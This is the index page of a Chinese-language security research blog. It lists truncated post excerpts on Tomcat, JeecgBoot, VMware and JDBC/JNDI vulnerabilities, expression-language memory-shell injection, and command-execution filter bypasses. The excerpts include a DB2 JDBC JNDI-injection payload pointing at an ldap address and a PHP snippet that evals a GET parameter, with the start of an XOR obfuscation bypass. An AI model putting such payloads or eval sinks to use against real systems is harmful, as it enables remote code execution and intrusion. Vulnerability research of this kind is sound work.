Pho3n1x
  • Home
  • Archives
  • Categories
  • Tags
  • About

Tomcat 远程命令执行漏洞(CVE-2024-50379)

Tomcat 远程命令执行漏洞(CVE-2024-50379)前言中午突然看见Tomcat出漏洞了,还是RCE就想赶紧分析一把,虽然看着很眼熟(CVE-2017-12615),但是实际测试下来,还是有一个不同的,那就是我们需要绕过路径检查,下面是我分析的过程。 分析影响版本11.0.0-M1 <= Apache Tomcat < 11.0.2 10.1.0-M1 <&#
2024-12-18
CVE
#CVE #代码审计 #Apache

解析语言内存马注入(一)

解析语言内存马注入(一)前言在一直以来的漏洞挖掘和攻防过程中,我们会发现经常会出现表达式语言注入漏洞,而为了稳定获取权限就不可避免的需要注入内存马 解析语言概述本文会测试使用的表达式语言基本都是常见的java表达式语言或常见模板,一共6种,如下所示: 123456ELOGNLSPELThymeleafVelocityFreeMarker 解析语言介绍EL表达式EL表达式全名Expression
2024-03-01
学习记录
#java

JNDI注入挖掘

这里有东西被加密了,需要输入密码查看哦。
2023-12-29
rce
#代码审计

Java_JDBC(commonscollection3.2.2)Bypass

Java_JDBC(commonscollection3.2.2)Bypass0x01 分析题目简单捋捋信息,访问题目得到一个连接测试页面 题目给出的附件如下: 不难看出考点是DB2的JNDI注入,DB2打JNDI的payload大致如下: 1jdbc:db2://127.0.0.1:50001/db:clientRerouteServerListJNDIName=ldap://127.0.0
2023-12-29
rce
#CTF #Bypass

LimeSurvey GetShell

这里有东西被加密了,需要输入密码查看哦。
2023-12-26
rce
#代码审计

CVE-2023-41544(JeecgBoot FreeMarker SSTI)

DescriptionThe JeecgBoot/jeecg boot/jmreport/loadTableData Api interface does not have identity verification. Freemarker is used to process SQL parameters passed in by the user, and arb
2023-09-18
CVE
#CVE #代码审计 #JeecgBoot

CVE-2023-41543(JeecgBoot Sql Injection)

DescriptionJEECG Boot v3.5.3 was discovered to contain a SQL injection in /sys/replicate/check Affected versionJeecgBoot <= v3.5.3 Vulnerability AnalysisIt was found that the fr
2023-09-18
CVE
#CVE #代码审计 #JeecgBoot

CVE-2022-22972(VM_access_Identity_authentication_bypass)

Vulnerability DescriptionVMware is a provider of global desktop to data center virtualization solutions, offering products including our most familiar VMware Workstation, a desktop virtual computing s
2023-09-18
CVE
#CVE #VMware #代码审计

CVE-2023-41542(JeecgBoot Sql Injection)

DescriptionJEECG Boot v3.5.3 was discovered to contain a SQL injection in /jeecg boot/jmreport/qurestSql Affected versionJeecgBoot <= v3.5.3 Vulnerability AnalysisIt was found t
2023-09-15
CVE
#CVE #代码审计 #JeecgBoot

命令执行绕过

命令执行无字母数字绕过12345678910111213141516171819202122232425if(!preg_match('/[a-z0-9]/is',$_GET['shell'])){ eval($_GET['shell']);}1.异或$_=('%01'^'`'
2022-07-14
rce
#WAF绕过 #rce
12

Search

Hexo Fluid
Views: Visitors: